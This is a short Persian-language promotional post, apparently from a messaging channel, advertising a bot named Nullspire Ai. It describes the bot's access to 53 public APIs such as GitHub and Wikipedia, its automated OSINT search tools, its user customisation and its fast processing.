- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیتهاب (GitHub) برای مدیریت کدها و پروژهها، ویکیپدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعهای از سایتهای تخصصی اطلاعاتی و پایگاههای داده، امکان جمعآوری و پردازش حجم عظیمی از دادهها را فراهم میسازد.
- ابزارهای حرفهای OSINT (هوشیابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمعآوری اطلاعات از منابع باز را بهشکل خودکار و دقیق تسهیل میکند. این قابلیت برای تحلیلهای عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصیسازی بالا و انعطافپذیری: کاربران میتوانند با تنظیمات دقیق و شخصیسازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجیها کاملاً متناسب با اهداف آنها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش همزمان درخواستها و پاسخگویی سریع، Nullspire Ai برای انجام پروژههای بزرگ و پیچیده ایدهآل است.
❤5